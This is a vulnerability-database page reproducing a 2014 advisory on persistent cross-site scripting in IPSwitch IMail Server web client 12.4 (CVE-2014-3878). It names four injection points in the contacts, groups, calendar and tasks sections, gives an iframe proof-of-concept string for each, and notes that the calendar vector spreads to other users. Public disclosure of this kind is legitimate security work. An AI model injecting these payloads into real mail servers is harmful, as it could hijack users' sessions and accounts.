Lucene search
K

IPSwitch IMail Server WEB client 12.4 persistent XSS

🗓️ 06 Jun 2014 00:00:00Reported by PeruType 
zdt
 zdt
🔗 0day.today👁 26 Views

IPSwitch IMail Server WEB client 12.4 persistent XSS, 4 injection points, CVE-2014-387

Related
Code
ReporterTitlePublishedViews
Family
CVE
CVE-2014-3878
5 Jun 201417:00
cve
Cvelist
CVE-2014-3878
5 Jun 201417:00
cvelist
EUVD
EUVD-2014-3815
7 Oct 202500:30
euvd
Tenable Nessus
Ipswitch IMail Server 11.x / 12.x < 12.4.1.15 Multiple Vulnerabilities (Heartbleed)
14 Jul 201400:00
nessus
NVD
CVE-2014-3878
5 Jun 201417:55
nvd
Packet Storm News
IPSwitch IMail 12.4 Cross Site Scripting
4 Jun 201400:00
packetstormnews
Prion
Cross site scripting
5 Jun 201417:55
prion
# Exploit Title: IPSwitch IMail Server WEB client 12.4 persistent XSS
# Google Dork:
# Date: 3 june 2014
# Exploit Author: Peru (GoSecure!)
# Vendor Homepage: www.ipswitch.com
# Software Link: http://www.imailserver.com/try/
# Version: Tested on 12.3 and 12.4 before 12.4.1.15
# Tested on: WindowsServer2008R2 STD SP1
# CVE : 2014-3878
 
Four injection points were useful to create a persistent Cross Site Scripting. All the injections are reached using default Web Client interface, but the Web Client Lite seems to be not vulnerable to these tests.
 
1. Contacts section:
 A persistent XSS can be reached adding a new contact with a specific string in the Name field and whatever image:
 
PoC string:
Go<IFRAME SRC="javascript:alert('www.gosecure.it');"></IFRAME>Secure!
 
 
When the contact is saved and on mouse over the picture the Name is been displayed in a bubble activating the JS:
 
 
2. Contacts section:
 A vulnerability can also be reached in the Adding Group task.
 
PoC string:
<iframe src="http://www.gosecure.it" height=500 width=500 frameborder=1 align=center></iframe>
 
 
3. Calendar section:
A persistent XSS can be reached adding a new event in the Calendar; this event can be spread adding the Meeting Request option.
 Since, using this injection point, the XSS can be spread to other users, this is the most dangerous of the four and can be used to spoofing sessions and therefore compromising the attacked users account
 
The JavaScript is executed simply viewing the calendar or when the Reminder pops up.
 
PoC string:
GS!<IFRAME SRC="javascript:alert(‘GoSecure!');"></IFRAME>
 
 
4.Task section:
 In a similar way also the tasks are vulnerable to persistent XXS.
 
PoC string:
<iframe src=http://www.gosecure.it/blog/remote/xss_h.html>

#  0day.today [2018-04-05]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation